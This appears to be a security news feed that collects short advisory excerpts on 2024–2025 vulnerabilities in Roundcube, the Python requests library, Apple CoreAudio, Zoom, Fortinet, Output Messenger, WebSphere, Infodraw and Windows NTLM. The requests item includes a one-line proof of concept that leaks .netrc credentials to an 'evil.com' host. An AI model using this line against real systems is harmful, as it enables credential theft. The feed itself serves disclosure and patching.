Recent comments

This template looks at the HTML body for the rcversion value and then matches on vulnerable versions. Here is a mapping of the RAW HTML value and version mapping for Roundcube:

• 10502 1.5.2
• 10601 1.6.1
• 10506 1.5.6
• 10500 1.5.0
• 10609 1.6.9
• 10611 1.6.11
• 10510 1.5.10
• 10505 1.5.5
• 10503 1.5.3
• 10610 1.6.10
• 10509 1.5.9
• 10607 1.6.7
• 10602 1.6.2
• 10606 1.6.6
• 10605 1.6.5

More information.

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245

The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available. CVE-2024-47081 has been reserved by GitHub for this issue.

As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.

On April 16, 2025, Apple released a patch for a bug in CoreAudio which they said was “Actively exploited in the wild.” This flew under the radar a bit. Epsilon’s blog has a great writeup of the other bug that was presumably exploited in this chain: a bug in RPAC. The only thing out there that I am aware of about the CoreAudio side of the bug is a video by Billy Ellis (it’s great. I’m featured. You should watch…you’re probably here from that anyways). As he mentioned in the video, “Another security researcher by the name of ‘Noah’ was able to tweak the values such that when it was played on MacOS, it actually did lead to a crash.” I think it’s still worth it to write about that ‘tweaking’ process in more detail.

I had just finished another project and ended up on a spreadsheet maintained by Project Zero which tracks zero days that have been actively exploited in the wild. It just so happened that that day there had been another addition: CVE-2025-31200. I couldn’t find any writeups on it, or really any information other than the fact that it was a “memory corruption in CoreAudio” so I decided to have a look myself. How hard could it be?

For more details - https://blog.noahhw.dev/posts/cve-2025-31200/

The vulnerabilities could be used by attackers to gain access to services and data. They can also be used to execute arbitrary commands and cause a denial of service. Confidentiality, integrity and availability are all impacted. The only solution is to upgrade immediately.

Description In its security release of 13 May 2025, Zoom addressed two vulnerabilities that could be exploited for privilege escalation: • CVE-2025-30663, a time-of-check time-of-use race condition affecting some Zoom Workplace Apps. If successfully exploited, an authenticated user could conduct an escalation of privilege via local access. • CVE-2025-30664 is an improper neutralization of special elements flaw affecting some Zoom Workplace Apps. Successful exploitation could allow an authenticated user to conduct an escalation of privilege via local access.

Risks

FortiOS, FortiProxy, and FortiSwitchManager are core components of Fortinet’s network security and management infrastructure, which provide firewalling, proxy services, and centralized switch management.

CVE-2025-22252 is a missing authentication vulnerability that allows an unauthenticated attacker with knowledge of an existing admin account to access the device as a valid admin. Exploitation of this flaw could grant attackers unauthorized control over network infrastructure, threatening confidentiality through data exposure, integrity via configuration tampering, and availability by disrupting critical services.

Description

CVE-2025-22252 is a missing authentication for critical function vulnerability in devices configured to use a remote TACACS+ server for authentication configured to use ASCII authentication. It may allow an attacker with knowledge of an existing admin account to access the device as a valid admin via an authentication bypass, potentially resulting in complete system compromise, data theft and service disruption.

Microsoft discovered critical vulnerability CVE-2025-27920 affecting the messaging application Output Messenger. Microsoft additionally observed exploitation of the vulnerability since April 2024. According to Microsoft, the attacker needs to be authenticated, although the Output Messenger advisory indicates that privileges are not required to exploit the vulnerability. An attacker could upload malicious files into the server’s startup directory by exploiting this directory traversal vulnerability. This allows an attacker to gain indiscriminate access to the communications of every user, steal sensitive data and impersonate users, possibly leading to operational disruptions, unauthorized access to internal systems, and widespread credential compromise.

Abstract IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)

Download Description

PH65941 resolves the following problem:

ERROR DESCRIPTION: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)

PROBLEM SUMMARY: IBM WebSphere Application Server is vulnerable to server-side request forgery (CVE-2025-27907 CVSS 4.1)

PROBLEM CONCLUSION: Confidential for CVE-2025-27907.

The fix for this APAR is targeted for inclusion in 8.5.5.28, 9.0.5.24.

For more information, see Recommended Updates for WebSphere Application Server: https://www.ibm.com/support/pages/node/715553

Prerequisites None

Problems Solved PH65941

Source: https://www.ibm.com/support/pages/node/7231182

Numerous law enforcement agencies worldwide have been affected by a zero-day exploit (path traversal) in reconnaissance software. This apparently also includes body cameras used by special forces, surveillance equipment, and police drones.

The „Media Relay Service (MRS)“ (web server) software for reconnaissance devices from the Israeli manufacturer Infodraw is affected by a serious security vulnerability (Path Traversal Vulnerability). Security experts from Mint Secure discovered the vulnerability and initially reported it to the manufacturer and – due to a lack of response – subsequently to operators and CERTs worldwide in order to rule out further risks and responsibly disclose the vulnerability. This blog post describes technical details, cases from various countries, and the approach behind the discovery. Recommendations for affected organizations are also provided.

• CVE-2025-24054 is a vulnerability related to NTLM hash disclosure via spoofing, which can be exploited using a maliciously crafted .library-ms file. Active exploitation in the wild has been observed since March 19, 2025, potentially allowing attackers to leak NTLM hashes or user passwords and compromise systems. Although Microsoft released a patch on March 11, 2025, threat actors already had over a week to develop and deploy exploits before the vulnerability began to be actively abused.

• Around March 20–21, 2025, a campaign targeted government and private institutions in Poland and Romania. Attackers used malspam to distribute a Dropbox link containing an archive that exploited multiple known vulnerabilities, including CVE-2025-24054, to harvest NTLMv2-SSP hashes.

  • Initial reports suggested that exploitation occurred once the .library-ms file was unzipped. However, Microsoft’s patch documentation indicated that the vulnerability could even be triggered with minimal user interaction, such as right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. This exploit appears to be a variant of a previously patched vulnerability, CVE-2024-43451, as both share several similarities.

For more details: CVE-2025-24054, NTLM Exploit in the Wild